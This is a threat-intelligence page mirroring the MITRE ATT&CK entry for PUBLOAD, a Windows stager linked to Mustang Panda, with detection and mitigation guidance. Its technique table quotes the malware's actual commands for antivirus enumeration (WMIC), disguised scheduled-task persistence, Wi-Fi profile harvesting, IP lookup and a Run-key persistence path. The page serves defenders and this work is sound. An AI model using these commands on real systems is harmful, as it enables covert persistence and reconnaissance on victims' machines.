S1228: PUBLOAD
PUBLOAD is a stager malware that has been observed installing itself in existing directories such as `C:\Users\Public` or creating new directories to stage the malware and its components.[1] PUBLOAD malware collects details of the victim host, establishes persistence, encrypts victim details using RC4 and communicates victim details back to C2. PUBLOAD malware has previously been leveraged by China-affiliated actors identified as Mustang Panda. PUBLOAD is also known as “NoFive” and some public reporting identifies the loader component as CLAIMLOADER.[2]
Analyst context for executives and security teams
PUBLOAD matters because it represents a Windows stager pattern: establish a foothold, place components in believable local directories such as C:\Users\Public or newly created staging paths, collect host details, persist, and communicate back to command and control. For leaders, the decision value is not just “malware exists,” but whether the organization can quickly prove what ran, where it staged files, what persistence was created, what host details left the environment, and whether follow-on tool transfer occurred.
Executive priority
Prioritize PUBLOAD as a readiness test for Windows endpoint visibility, egress monitoring, and incident response scoping. The ATT&CK relationships connect it to discovery, scheduled task persistence, command shell/WMI execution, obfuscation/compression, web/file-transfer based C2, and ingress tool transfer. That combination can affect business continuity by turning an initial host compromise into a harder-to-scope intrusion. Executives should ask whether SOC and IR teams can produce audit-ready evidence for endpoint process activity, task creation, suspicious staging directories, registry/service discovery, and outbound network sessions from affected hosts.
Technical view
PUBLOAD is a Windows malware object with no official ATT&CK detection text provided. Defensive validation should therefore be behavior-led using its mapped relationships: monitor creation and execution of files from public or newly created staging directories; correlate command shell, WMI, scheduled task, registry query, service/process/network discovery, and system information collection activity; and review outbound web or file-transfer protocol traffic that may impersonate legitimate services. Because the object is described as encrypting victim details with RC4 and communicating them to C2, network and host triage should focus on unusual outbound sessions following host discovery and persistence events rather than relying only on static signatures.
Likely telemetry
- Windows endpoint process creation and command-line logs
- File creation, modification, and execution events in C:\Users\Public and other newly created directories
- Scheduled task creation and modification telemetry
- WMI activity and command execution records
- Windows Registry query activity
Detection direction
- Validate correlations across staging location, execution, discovery, persistence, and outbound communication; single events such as C:\Users\Public file creation may be noisy without sequence context.
- Tune for suspicious use of cmd.exe, WMI, schtasks, registry queries, service enumeration, and process/network discovery when performed by unusual parent processes or from uncommon directories.
- Review outbound web and file-transfer protocol traffic from newly infected or rarely communicating endpoints, especially after local discovery activity.
- Account for false positives from legitimate administration, software deployment, inventory tools, and help desk scripts; baselining approved management activity is important.
- Because no official detection guidance is supplied, do not assume existing ATT&CK coverage maps detect PUBLOAD specifically; test detections against the mapped behaviors instead.
Mitigation priorities
- Harden Windows endpoint execution controls around user-writable and public directories where feasible.
- Restrict and monitor scheduled task creation, WMI usage, command shell execution, and registry/service discovery by non-administrative or unexpected processes.
- Ensure endpoint detection, centralized logging, and network egress telemetry are retained long enough to reconstruct staging, persistence, discovery, and C2 timelines.
- Apply least privilege and administrative tool governance to reduce abuse of legitimate Windows management features.
- Use egress filtering and proxy/firewall review to limit unnecessary outbound web and file-transfer protocol paths from workstations and servers.
Analyst notes and limits
ATT&CK identifies PUBLOAD as a stager observed installing in existing directories such as C:\Users\Public or creating new directories to stage malware and components. It is described as collecting victim host details, establishing persistence, encrypting victim details using RC4, and communicating those details back to C2. ATT&CK also notes prior use by the China-affiliated group Mustang Panda and reporting overlap where PUBLOAD is known as NoFive and the loader component may be identified as CLAIMLOADER in public reporting.
The supplied ATT&CK object has no official detection section and no malware-level tactics listed. The guidance above is derived from the official description, Windows platform field, external references, and supplied relationships to techniques. Local validation is required to determine whether telemetry exists, whether detections are enabled, and whether observed activity is malicious or legitimate administration.
PUBLOAD
PUBLOAD is a stager malware that has been observed installing itself in existing directories such as `C:\Users\Public` or creating new directories to stage the malware and its components.[1] PUBLOAD malware collects details of the victim host, establishes persistence, encrypts victim details using RC4 and communicates victim details back to C2. PUBLOAD malware has previously been leveraged by China-affiliated actors identified as Mustang Panda. PUBLOAD is also known as “NoFive” and some public reporting identifies the loader component as CLAIMLOADER.[2]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1105 | Ingress Tool Transfer | PUBLOAD has acted as a stager that can download the next-stage payload from its C2 server.CitationLab52 MUSTANG PANDA PUBLOAD MAY 2023CitationIBM MUSTANG PANDA PUBLOAD CLAIMLOADER JUNE 2025Citation2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDACitation2022 November_TrendMicro_Earth Preta_Toneshell_PubloadCitationPalo Alto Networks, Unit 42 PUBLOAD has also delivered FDMTP as a secondary control tool and PTSOCKET for exfiltration to some infected systems.CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024 |
| Enterprise | T1518.001 | Security Software Discovery Sub-technique | PUBLOAD has identified AV products on an infected host using the following command: `WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List`.CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024 |
| Enterprise | T1553.002 | Code Signing Sub-technique | PUBLOAD has used valid legitimate digital signatures and certificates to evade detection.CitationCSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024 |
| Enterprise | T1033 | System Owner/User Discovery | PUBLOAD has obtained the username from an infected host.CitationCisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022CitationCSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024Citation2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDACitation2022 November_TrendMicro_Earth Preta_Toneshell_Pubload |
| Enterprise | T1614.001 | System Language Discovery Sub-technique | PUBLOAD has checked supported languages on the compromised system.CitationCSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024 |
| Enterprise | T1001.003 | Protocol or Service Impersonation Sub-technique | PUBLOAD has modified HTTP POST requests to resemble legitimate communications.CitationLab52 MUSTANG PANDA PUBLOAD MAY 2023CitationPalo Alto Networks, Unit 42 PUBLOAD used FakeTLS headers in network packets to impersonate various versions of TLS protocols to blend in with legitimate network traffic. PUBLOAD has utilized FakeTLS headers with the bytes 17 03 03.Citation2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | PUBLOAD has created scheduled tasks to maintain persistence with the command `schtasks.exe /F /Create /TN Microsoft_Licensing /sc minute /MO 1 /TR C:\\Users\\Public\\Libraries\...`CitationCisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022CitationLab52 MUSTANG PANDA PUBLOAD MAY 2023Citation2022 November_TrendMicro_Earth Preta_Toneshell_Pubload |
| Enterprise | T1622 | Debugger Evasion | PUBLOAD has embedded debug strings with messages to distract analysts.CitationCisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022Citation2022 November_TrendMicro_Earth Preta_Toneshell_Pubload PUBLOAD has leveraged `OutputDebugStringW` and `OutputDebugStringA` functions.Citation2022 November_TrendMicro_Earth Preta_Toneshell_Pubload |
| Enterprise | T1027.015 | Compression Sub-technique | PUBLOAD has been delivered as compressed files within ZIP files to victims.CitationLab52 MUSTANG PANDA PUBLOAD MAY 2023CitationPalo Alto Networks, Unit 42 |
| Enterprise | T1057 | Process Discovery | PUBLOAD has used `tasklist` to gather running processes on victim host.CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024 PUBLOAD has also leveraged the `OpenEventA` Windows API function to check whether the same process was already running.Citation2022 November_TrendMicro_Earth Preta_Toneshell_Pubload |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | PUBLOAD has decoded its payload prior to execution.CitationCisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022CitationLab52 MUSTANG PANDA PUBLOAD MAY 2023Citation2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDACitation2022 November_TrendMicro_Earth Preta_Toneshell_PubloadCitationPalo Alto Networks, Unit 42 |
| Enterprise | T1071.002 | File Transfer Protocols Sub-technique | PUBLOAD has used `curl` for data exfiltration over FTP.CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024 |
| Enterprise | T1016.002 | Wi-Fi Discovery Sub-technique | PUBLOAD has collected information on Wi-Fi networks from victim hosts leveraging `netsh wlan show profiles`, `netsh wlan show interface`, and `netsh wlan show`. CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024 |
| Enterprise | T1573.001 | Symmetric Cryptography Sub-technique | PUBLOAD has used RC4 encryption in C2 communications.CitationCisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022CitationCSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024Citation2022 November_TrendMicro_Earth Preta_Toneshell_Pubload |
| Enterprise | T1574.001 | DLL Sub-technique | PUBLOAD has abused legitimate executables to side-load malicious DLLs.CitationCisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022CitationCSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024CitationLab52 MUSTANG PANDA PUBLOAD MAY 2023Citation2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDACitation2022 November_TrendMicro_Earth Preta_Toneshell_PubloadCitationPalo Alto Networks, Unit 42CitationPaloAlto MUSTANG PANDA PUBLOAD MARCH 2024 |
| Enterprise | T1016 | System Network Configuration Discovery | PUBLOAD has obtained information about local networks through the `ipconfig /all` command.CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024 |
| Enterprise | T1480.001 | Environmental Keying Sub-technique | PUBLOAD has utilized environmental keying in the payload to include the victim volume serial number, computer name, username, and machine’s tick count.Citation2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | PUBLOAD has used several commands executed in sequence via `cmd`. CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024 |
| Enterprise | T1027 | Obfuscated Files or Information | PUBLOAD has obfuscated DLL names using the ror13AddHash32 algorithm.CitationCisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | PUBLOAD has added Registry Run keys to achieve persistence using `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`. CitationCisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022CitationCSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024CitationLab52 MUSTANG PANDA PUBLOAD MAY 2023CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024Citation2022 November_TrendMicro_Earth Preta_Toneshell_Pubload |
| Enterprise | T1106 | Native API | PUBLOAD has used various Windows API calls during execution, when establishing persistence and defense evasion.CitationLab52 MUSTANG PANDA PUBLOAD MAY 2023Citation2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA PUBLOAD stager leveraged Windows API functions with callback including `GrayStringW`, `EnumDateFormatsA`, and `LineDDA` to bypass anti-virus monitoring. Citation2022 November_TrendMicro_Earth Preta_Toneshell_Pubload PUBLOAD has also utilized other native windows API functions with callback functions such as `EnumChildWindows` and `EnumSystemLanguageGroupsA`. CitationPalo Alto Networks, Unit 42 |
| Enterprise | T1560.001 | Archive via Utility Sub-technique | PUBLOAD has used utilities such as `WinRAR` to archive data prior to exfiltration.CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024 |
| Enterprise | T1680 | Local Storage Discovery | PUBLOAD has leveraged `wmic logicaldisk get` to map local network drives.CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024 |
| Enterprise | T1518 | Software Discovery | PUBLOAD has used several commands executed in sequence via `cmd` in a short interval to gather software versions including querying Registry keys.CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024 |
| Enterprise | T1012 | Query Registry | PUBLOAD has queried Registry values to identify software using `reg query`.CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024 |
| Enterprise | T1205 | Traffic Signaling | PUBLOAD has utilized a magic value in C2 communications and only executes in memory when response packets match specific values of 17 03 03.CitationCSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024CitationIBM MUSTANG PANDA PUBLOAD CLAIMLOADER JUNE 2025Citation2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDACitation2022 November_TrendMicro_Earth Preta_Toneshell_PubloadCitationPaloAlto MUSTANG PANDA PUBLOAD MARCH 2024 PUBLOAD has also used magic bytes consisting of 46 77 4d.CitationCSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024 |
| Enterprise | T1016.001 | Internet Connection Discovery Sub-technique | PUBLOAD has identified internet connectivity details through commands such as `tracert -h 5 -4 google.com` and `curl http://myip.ipip.net`.CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | PUBLOAD has communicated via `curl` over HTTP to identify device IP data.CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024 PUBLOAD has also utilized HTTP for a command-and-control protocol through HTTP POST.CitationCSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024CitationLab52 MUSTANG PANDA PUBLOAD MAY 2023CitationPalo Alto Networks, Unit 42 PUBLOAD has also leveraged HTTPS for C2.Citation2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA |
| Enterprise | T1007 | System Service Discovery | PUBLOAD has leveraged `tasklist` to gather running services on victim host.CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024 |
| Enterprise | T1124 | System Time Discovery | PUBLOAD has collected the machine’s tick count through the use of `GetTickCount`.Citation2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA |
| Enterprise | T1049 | System Network Connections Discovery | PUBLOAD has used several commands executed in sequence via `cmd` in a short interval to gather information on network connections.CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024 |
| Enterprise | T1047 | Windows Management Instrumentation | PUBLOAD has used `wmic` to gather information from the victim device.CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024 |
| Enterprise | T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol Sub-technique | PUBLOAD has leveraged `curl` for data exfiltration over FTP by uploading RAR archives containing targeted files (.doc, .docx, .xls, .xlsx, .pdf, .ppt, .pptx) to an adversary-owned FTP site.CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024 |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location Sub-technique | PUBLOAD has renamed malicious files to mimic legitimate file names such as adobe_wf.exe.Citation2022 November_TrendMicro_Earth Preta_Toneshell_Pubload |
| Enterprise | T1082 | System Information Discovery | PUBLOAD has collected and sent system information including volume serial number, computer name, and system uptime to designated C2.CitationCisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022Citation2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA PUBLOAD has also used several commands executed in sequence via `cmd` in a short interval to gather system information about the infected host including `systeminfo`.CitationTrend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024 PUBLOAD has decrypted shellcode that collects the computer name.Citation2022 November_TrendMicro_Earth Preta_Toneshell_Pubload |
Groups, software, and campaigns
G0129: Mustang Panda
Mustang Panda is a China-based cyber espionage threat actor that has been conducting operations since at least 2012. Mustang Panda has been known to use tailored phishing lures and decoy documents to deliver malicious payloads. Mustang Panda has targeted government, diplomatic, and non-governmental organizations, including think tanks, religious institutions, and research entities, across the United States, Europe, and Asia, with notable activity in Russia, Mongolia, Myanmar, Pakistan, and Vietnam. [1][2][3][4][5][6][7][8][9][10][11][12][13]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.1 | Current bundle | 6d7e178c3ac5… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
2022 November_TrendMicro_Earth Preta_Toneshell_Pubload
Nick Dai, Vickie Su, Sunny Lu. (2022, November 18). Earth Preta Spear-Phishing Governments Worldwide. Retrieved August 4, 2025.
Open source URL -
[2]
2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA
Golo Muhr, Joshua Chung. (2025, May 15). Hive0154 targeting US, Philippines, Pakistan and Taiwan in suspected espionage campaign. Retrieved August 4, 2025.
Open source URL -
[3]
mitre-attack S1228Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.